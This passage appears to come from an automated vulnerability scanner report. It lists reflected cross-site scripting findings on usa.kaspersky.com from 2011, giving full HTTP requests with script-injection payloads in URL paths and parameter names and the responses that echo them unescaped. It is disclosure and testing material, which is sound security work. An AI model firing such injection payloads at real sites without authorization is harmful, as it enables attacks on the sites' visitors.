Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:07:08 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145228"
Content-Type: text/html; charset=utf-8
Content-Length: 39318
Date: Sun, 04 Sep 2011 14:07:15 GMT
X-Varnish: 1163247766
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-us/index.html?4d145"><script>alert(1)</script>2fdc71b9919=1" />
...[SNIP]...

1.67. http://usa.kaspersky.com/about-us/index.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6a5e"-alert(1)-"5bd0805b351 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /about-us/index.html?d6a5e"-alert(1)-"5bd0805b351=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:07:48 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145268"
Content-Type: text/html; charset=utf-8
Content-Length: 38988
Date: Sun, 04 Sep 2011 14:08:00 GMT
X-Varnish: 1163249336
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/about-us/index.html?d6a5e"-alert(1)-"5bd0805b351=1";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.68. http://usa.kaspersky.com/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78970"-alert(1)-"54a60fcb75b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /index.html78970"-alert(1)-"54a60fcb75b HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:10:20 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145420"
Content-Type: text/html; charset=utf-8
Content-Length: 30557
Date: Sun, 04 Sep 2011 14:10:28 GMT
X-Varnish: 1163255153
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
) { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/index.html78970"-alert(1)-"54a60fcb75b";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.69. http://usa.kaspersky.com/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/index.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3593"><script>alert(1)</script>31e1b81b14a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.htmlf3593"><script>alert(1)</script>31e1b81b14a HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:09:52 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145392"
Content-Type: text/html; charset=utf-8
Content-Length: 32124
Date: Sun, 04 Sep 2011 14:09:58 GMT
X-Varnish: 1163254250
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/index.htmlf3593"><script>alert(1)</script>31e1b81b14a" />
...[SNIP]...

1.70. http://usa.kaspersky.com/index.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1eb7a"><script>alert(1)</script>b8beb20b2dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.html?1eb7a"><script>alert(1)</script>b8beb20b2dd=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:06:42 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145202"
Content-Type: text/html; charset=utf-8
Content-Length: 37512
Date: Sun, 04 Sep 2011 14:07:01 GMT
X-Varnish: 1163247051
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/index.html?1eb7a"><script>alert(1)</script>b8beb20b2dd=1" />
...[SNIP]...

1.71. http://usa.kaspersky.com/index.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf166"-alert(1)-"c843acf5a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /index.html?cf166"-alert(1)-"c843acf5a4=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:07:32 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145252"
Content-Type: text/html; charset=utf-8
Content-Length: 37350
Date: Sun, 04 Sep 2011 14:07:41 GMT
X-Varnish: 1163248685
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
{ s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/index.html?cf166"-alert(1)-"c843acf5a4=1";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.72. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/modules/search/search.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e8ad"-alert(1)-"90934118b45 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /modules6e8ad"-alert(1)-"90934118b45/search/search.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y; gpv_pageName=Homepage; s_nr=1315139049879-New

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:28:14 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139294"
Content-Type: text/html; charset=utf-8
Content-Length: 34734
Date: Sun, 04 Sep 2011 12:28:29 GMT
X-Varnish: 1163059887
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
es') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/modules6e8ad"-alert(1)-"90934118b45/search/search.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.73. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/modules/search/search.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25232"><script>alert(1)</script>11c08334a02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules25232"><script>alert(1)</script>11c08334a02/search/search.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y; gpv_pageName=Homepage; s_nr=1315139049879-New

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:27:44 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139264"
Content-Type: text/html; charset=utf-8
Content-Length: 36526
Date: Sun, 04 Sep 2011 12:27:53 GMT
X-Varnish: 1163058817
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/modules25232"><script>alert(1)</script>11c08334a02/search/search.css?R" />
...[SNIP]...

1.74. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/modules/search/search.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eae4"><script>alert(1)</script>52b4770be9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/search4eae4"><script>alert(1)</script>52b4770be9/search.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y; gpv_pageName=Homepage; s_nr=1315139049879-New

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:29:53 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139393"
Content-Type: text/html; charset=utf-8
Content-Length: 32448
Date: Sun, 04 Sep 2011 12:30:01 GMT
X-Varnish: 1163062399
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/modules/search4eae4"><script>alert(1)</script>52b4770be9/search.css?R" />
...[SNIP]...

1.75. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/modules/search/search.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee881"-alert(1)-"2890634d7c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /modules/searchee881"-alert(1)-"2890634d7c4/search.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y; gpv_pageName=Homepage; s_nr=1315139049879-New

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:30:24 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139424"
Content-Type: text/html; charset=utf-8
Content-Length: 30679
Date: Sun, 04 Sep 2011 12:30:35 GMT
X-Varnish: 1163063264
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/modules/searchee881"-alert(1)-"2890634d7c4/search.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.76. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/modules/search/search.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97cbc"><script>alert(1)</script>51d3a489a86 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/search/search.css97cbc"><script>alert(1)</script>51d3a489a86?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y; gpv_pageName=Homepage; s_nr=1315139049879-New

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:32:10 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139530"
Content-Type: text/html; charset=utf-8
Content-Length: 32889
Date: Sun, 04 Sep 2011 12:32:33 GMT
X-Varnish: 1163065920
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/modules/search/search.css97cbc"><script>alert(1)</script>51d3a489a86?R" />
...[SNIP]...

1.77. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/modules/search/search.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eccfd"-alert(1)-"a2f812229c6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /modules/search/search.csseccfd"-alert(1)-"a2f812229c6?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y; gpv_pageName=Homepage; s_nr=1315139049879-New

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:32:54 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139574"
Content-Type: text/html; charset=utf-8
Content-Length: 30678
Date: Sun, 04 Sep 2011 12:33:19 GMT
X-Varnish: 1163067352
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/modules/search/search.csseccfd"-alert(1)-"a2f812229c6?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.78. http://usa.kaspersky.com/node/12354/lightbox2 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/12354/lightbox2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f2b6"><script>alert(1)</script>377e8706d52 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node7f2b6"><script>alert(1)</script>377e8706d52/12354/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139100971-New; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Home%252520Users%252520%25257C%252520Kaspersky%252520Store%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257B%252524('%252523pure-users-3y-prices').show()%25253B%252524('%252523pure-users-2y-prices').hide()%25253B%252524('%252523pure-%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:08:06 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141686"
Content-Type: text/html; charset=utf-8
Content-Length: 30714
Date: Sun, 04 Sep 2011 13:08:13 GMT
X-Varnish: 1163125431
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node7f2b6"><script>alert(1)</script>377e8706d52/12354/lightbox2" />
...[SNIP]...

1.79. http://usa.kaspersky.com/node/12354/lightbox2 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/12354/lightbox2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60fc8"-alert(1)-"39c8314a1f9f02d6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /node60fc8"-alert(1)-"39c8314a1f9f02d6a/12354/lightbox2?pure-pp=https%3A%2F%2Fstore.digitalriver.com%2Fstore%2Fkasperus%2Fen_US%2Fbuy%2FproductID.224976400&x=0&y=0 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/node/12354/lightbox2
Cache-Control: max-age=0
Origin: http://usa.kaspersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
